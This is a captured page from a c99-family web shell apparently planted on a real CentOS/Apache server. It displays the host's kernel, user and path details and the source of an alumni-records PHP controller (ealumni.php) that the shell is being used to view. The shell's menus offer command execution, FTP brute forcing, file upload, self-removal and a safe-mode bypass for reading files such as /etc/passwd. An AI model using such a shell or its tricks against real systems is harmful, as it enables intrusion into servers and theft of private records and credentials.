!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/ealumni/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ealumni.php (10 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('ea_controller.php');
class 
Ealumni extends Ea_controller {

//    function __construct() {
//        parent::Controller();
//    }

    // ##### start add ealumni
    
function ea_input() {
        
$this->load->model($this->config->item('ppc_folder').'mo_prefix','pf');
        
$this->load->model($this->config->item('ppc_folder').'mo_nation','nt');
        
$this->load->model($this->config->item('ppc_folder').'mo_religion','rlg');

        
$this->contents['rs_pf'] = $this->pf->get_options();
        
$this->contents['rs_nt'] = $this->nt->get_options();
        
$this->contents['rs_rlg'] = $this->rlg->get_options();

        
$this->output($this->config->item("ea_folder")."v_addAlumni"$this->session->flashdata('msg'));
    }

    function 
ea_save() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('studentCode','รหัสนักศึกษา','trim|required|integer|xss_clean');
        
$this->form_validation->set_rules('citizenId','เลขที่บัตรประจำตัวประชาชน','trim|integer|xss_clean');
        
$this->form_validation->set_rules('pfName','คำนำหน้าชื่อ','trim|required|xss_clean');
        
$this->form_validation->set_rules('pfNameE','คำนำหน้าชื่อ','trim|required|xss_clean');
        
$this->form_validation->set_rules('studentName','ชื่อ (ไทย)','trim|required|xss_clean');
        
$this->form_validation->set_rules('studentSurname','นามสกุล (ไทย)','trim|required|xss_clean');
        
$this->form_validation->set_rules('studentNameEng','ชื่อ (อังกฤษ)','trim|xss_clean');
        
$this->form_validation->set_rules('studentSurnameEng','นามสกุล (อังกฤษ)','trim|xss_clean');
        
$this->form_validation->set_rules('oldPfName','คำนำหน้าชื่อ','trim|xss_clean');
        
$this->form_validation->set_rules('oldfName','ชื่อ (เดิม)','trim|xss_clean');
        
$this->form_validation->set_rules('oldlName','นามสกุล (เดิม)','trim|xss_clean');
        
$this->form_validation->set_rules('studentSex','เพศ','trim|xss_clean');
        
$this->form_validation->set_rules('bloodGroup','หมู่เลือด','trim|xss_clean');
        
$this->form_validation->set_rules('nationId','สัญชาติ','trim|xss_clean');
        
$this->form_validation->set_rules('religionId','ศาสนา','trim|xss_clean');
        
$this->form_validation->set_rules('birthDate','วันเกิด','trim|xss_clean');
        
$this->form_validation->set_rules('admitAcadYear','ปีที่เข้าศึกษา','trim|required|xss_clean');
        
$this->form_validation->set_rules('graduateYear','ปีที่จบการศึกษา','trim|required|xss_clean');
        
$this->form_validation->set_rules('programId','หลักสูตร','trim|required|xss_clean');
        
$this->form_validation->set_rules('genNo','รุ่นที่','trim|xss_clean');
        
$this->form_validation->set_rules('studentEmail','อีเมล์','valid_email');
        
$this->form_validation->set_rules('sdtPicturePath','รูป','trim|xss_clean');
        
$this->form_validation->set_rules('homeAddress','ที่อยู่ (ตามภูมิลำเนา)','trim|xss_clean');
        
$this->form_validation->set_rules('districtName','ตำบล','trim|xss_clean');
        
$this->form_validation->set_rules('amphurName','อำเภอ','trim|xss_clean');
        
$this->form_validation->set_rules('provinceName','จังหวัด','trim|xss_clean');
        
$this->form_validation->set_rules('homeZipcode','รหัสไปรษณีย์','trim|xss_clean');
        
$this->form_validation->set_rules('homePhoneNo','โทรศัพท์','trim|xss_clean');
        
$this->form_validation->set_rules('currentAddress','ที่อยู (ปัจจุบัน)่','trim|xss_clean');
        
$this->form_validation->set_rules('curDistrictName','ตำบล','trim|xss_clean');
        
$this->form_validation->set_rules('curAmphurName','อำเภอ','trim|xss_clean');
        
$this->form_validation->set_rules('curProvinceName','จังหวัด','trim|xss_clean');
        
$this->form_validation->set_rules('currentZipcode','รหัสไปรษณีย์','trim|xss_clean');
        
$this->form_validation->set_rules('currentPhoneNo','โทรศัพท์','trim|xss_clean');
        
$this->form_validation->set_rules('officeAddress','ที่อยู (ที่ทำงาน)่','trim|xss_clean');
        
$this->form_validation->set_rules('offDistrictName','ตำบล','trim|xss_clean');
        
$this->form_validation->set_rules('offAmphurName','อำเภอ','trim|xss_clean');
        
$this->form_validation->set_rules('offProvinceName','จังหวัด','trim|xss_clean');
        
$this->form_validation->set_rules('officeZipcode','รหัสไปรษณีย์','trim|xss_clean');
        
$this->form_validation->set_rules('officePhoneNo','โทรศัพท์','trim|xss_clean');
        
        
$flgmsg 0;
        if(
$this->form_validation->run() == true) {
            
$config['upload_path'] = $this->config->item('ea_upload_pictureStd');
            
$config['allowed_types'] = 'jpg';
            
$config['max_width'] = $this->config->item('ea_allowed_width');
            
$config['max_height'] = $this->config->item('ea_allowed_height');
            
$config['max_size']    = $this->config->item('ea_upload_size');
            
$this->load->library('upload');
            
            foreach(
$_FILES as $key => $value) {
                if(
$_FILES['sdtPicturePath']['name']!=""){
                    if(
file_exists($this->config->item('ea_upload_pictureStd').$this->input->post('studentCode').".jpg")) {
                        
rename ($this->config->item('ea_upload_pictureStd').$this->input->post('studentCode').".jpg"$this->config->item('ea_upload_pictureStd').$this->input->post('studentCode')."_old.jpg");
                    }

                    
$config['file_name'] = $this->input->post('studentCode');
                    
$this->upload->initialize($config);
                    if (
$this->upload->do_upload($key)){
                        if(
file_exists($this->config->item('ea_upload_pictureStd').$this->input->post('studentCode')."_old.jpg")) {
                            
unlink($this->config->item('ea_upload_pictureStd').$this->input->post('studentCode')."_old.jpg");
                        }

                        
$data = array('upload_data' => $this->upload->data());
                        
$file_name $data['upload_data']['file_name'];
                        
$path $data['upload_data']['file_path'];
                        
$picturePath $path.$file_name;
                    } else {
                        if(
file_exists($this->config->item('ea_upload_pictureStd').$this->input->post('studentCode')."_old.jpg")) {
                            
rename ($this->config->item('ea_upload_pictureStd').$this->input->post('studentCode')."_old.jpg"$this->config->item('ea_upload_pictureStd').$this->input->post('studentCode').".jpg");
                        }

                        
$error = array('error' => $this->upload->display_errors());
                        
$this->form_validation->set_rules('sdtPicturePath'trim($error['error']), 'callback_checkupload');
                    }
                }
            }
            
$this->load->model($this->config->item('ea_folder').'mo_alumnimain','am');
            
$this->am->alumniId '';
            
$this->am->studentCode $this->input->post('studentCode');
            
$this->am->citizenId $this->input->post('citizenId');
            
$this->am->prefixId $this->input->post('pfId');
            
$this->am->studentName $this->input->post('studentName');
            
$this->am->studentSurname $this->input->post('studentSurname');
            
$this->am->studentNameEng $this->input->post('studentNameEng');
            
$this->am->studentSurnameEng $this->input->post('studentSurnameEng');
            
$this->am->admitAcadYear $this->input->post('admitAcadYear');
            
$this->am->graduateYear $this->input->post('graduateYear');
            
$this->am->programId $this->input->post('programId');
            
$this->am->genNo $this->input->post('genNo');
            
$this->am->studentEmail $this->input->post('studentEmail');
            
$this->am->updateDateTime date('Y-m-d');
            
$this->am->updateUserId $this->session->userdata("UsName");
            
$this->am->studentStatus "4";
            
$this->am->insert();
            
            
$this->load->model($this->config->item('ea_folder').'mo_alumnibio','ab');
            
$this->ab->alumniId $this->am->last_insert_id();
            echo 
"-->".$this->ab->alumniId;
            
$this->ab->oldPrefixId $this->input->post('oldPfId');
            
$this->ab->oldfName $this->input->post('oldfName');
            
$this->ab->oldlName $this->input->post('oldlName');
            
$this->ab->studentSex $this->input->post('studentSex');
            
$this->ab->bloodGroup $this->input->post('bloodGroup');
            
$this->ab->nationId $this->input->post('nationId');
            
$this->ab->religionId $this->input->post('religionId');
            
$this->ab->birthDate $this->input->post('birthDate');
            
$this->ab->homeAddress $this->input->post('homeAddress');
            
$this->ab->homeDistrictId $this->input->post('districtId');
            
$this->ab->homeAmphurId $this->input->post('amphurId');
            
$this->ab->homeProvinceId $this->input->post('provinceId');
            
$this->ab->homeZipcode $this->input->post('homeZipcode');
            
$this->ab->homePhoneNo $this->input->post('homePhoneNo');
            
$this->ab->currentAddress $this->input->post('currentAddress');
            
$this->ab->currentDistrictId $this->input->post('curDistrictId');
            
$this->ab->currentAmphurId $this->input->post('curAmphurId');
            
$this->ab->currentProvinceId $this->input->post('curProvinceId');
            
$this->ab->currentZipcode $this->input->post('currentZipcode');
            
$this->ab->currentPhoneNo $this->input->post('currentPhoneNo');
            
$this->ab->currentAddress $this->input->post('officeAddress');
            
$this->ab->currentDistrictId $this->input->post('offDistrictId');
            
$this->ab->currentAmphurId $this->input->post('offAmphurId');
            
$this->ab->currentProvinceId $this->input->post('offProvinceId');
            
$this->ab->currentZipcode $this->input->post('officeZipcode');
            
$this->ab->currentPhoneNo $this->input->post('officePhoneNo');
            
$this->ab->picturePath 'photo.jpg';//$picturePath;
            
$this->ab->insert();
            echo 
$this->db->last_query();
            
        
            
$flgmsg 1;

            if(
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
                if(
$flgmsg)
                    
$this->session->set_flashdata('msg'2);
                } else {
                
$this->db->trans_commit();
                if(
$flgmsg)
                    
$this->session->set_flashdata('msg'1);
            }    
            
redirect($this->config->item("ea_folder")."ealumni/ea_input");
        }
        else
            
$this->ea_input();
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0104 ]--